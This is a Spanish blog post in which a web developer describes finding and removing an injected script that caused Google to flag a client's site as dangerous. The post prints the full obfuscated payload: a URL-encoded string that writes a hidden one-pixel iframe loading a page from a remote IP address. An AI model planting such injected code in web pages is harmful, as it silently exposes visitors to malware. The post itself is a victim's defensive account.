Lo último en ataques maliciosos.

El otro día una persona a la que le hice una web (http://www.danybinia.com) me escribió desesperado: "no sé que ocurre que cuando pongo mi nombre Google encuentra mi web pero le pone la siguiente cabecera al resultado Este sitio puede dañar tu equipo. .. .".
Realizo la búsqueda y veo que efectivamente han considerado la web en cuestión como "distribuidora" de software mailicioso. Me quedo bastante planchado y empiezo a sopesar las diferente posibilidades. No saco nada en claro.

Me pongo a investigar, al parecer desde hace un tiempo Google y Stopbadware.org se han asociado para detectar y "marcar" aquellas webs con riesgos importantes para los usuarios. Webs con spyware (programas espías) scripts chungos y similares. Desde la página de Stopbadware.org descubro que se puede consultar y preguntar acerca de los motivos que convierten una web en maliciosa. Me pongo a escribir un mail desesperado para que me expliquen que maldad reside en la web que hice. Pero me percato (visitando foros y blogs que tratan la tematica) de que raras veces los de Stopbadware contestan los mails.

No puedo confiar la suerte de mi web a una respuesta que no llegará. Así que me pongo a revisar el código de forma exhaustiva para ver si encuentro algo. De repente doy con la clave. Detecto una linea de codigo extrañisima al final de la página indice de la web: una función de javascript que hace una llamada extraña desde unos iframes camuflados tal que así:

( unescape( '%3C
%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E %39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C
%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D %22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E %67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F %69%66%72%61%6D%65%3E' ) );

Me voy al ftp de la web en cuestión y ordeno los archivos por fecha de modificación: ¡horror el index.html fue modificado hace cosa de tres semanas y nadie excepto yo accede a este ftp!
Me pongo en contacto con la empresa de hosting para que reseteen los passwords de todas las cuentas. Me cargo los archivos modificados y subo mis copias locales de la web.

Aún así no me fio y sigo investigando, tengo que cerciorarme de que no hay más "morralla" enla web. Posteo mi caso en Stopbadware para ver si pueden decirme si la situación se ha arreglado. Busco en mil foros y doy con el Google Webmaster Help. Me apunto (el grupo promete y mucho) y me doy cuenta de que no soy el único al que le ha pasado esto. Justamente doy con un tipo al que le paso lo mismo, como se puede ver aquí.

Espero que las medidas que he tomado hayan servido para erradicar el problema.
De todas formas he leído que la alerta en la página durará todavía algunas semanas.
Por temas de actualización de Google.

De lo ocurrido todavía quedan en el tintero muchas dudas:
¿tiene mi página un importante punto de vulneración que aun no he descubierto?
¿accedieron realmente por ftp al archivo que modificaron?
¿que hace realmente el script malicioso?

Enfin, enigmas sin resolver que produce la matemática moderna.

Si quereis comprobar si vuestra web produce algun tipo de maldad ahí va un link que os puede servir para testear el código: http://linkscanner.explabs.com/linkscanner/default.asp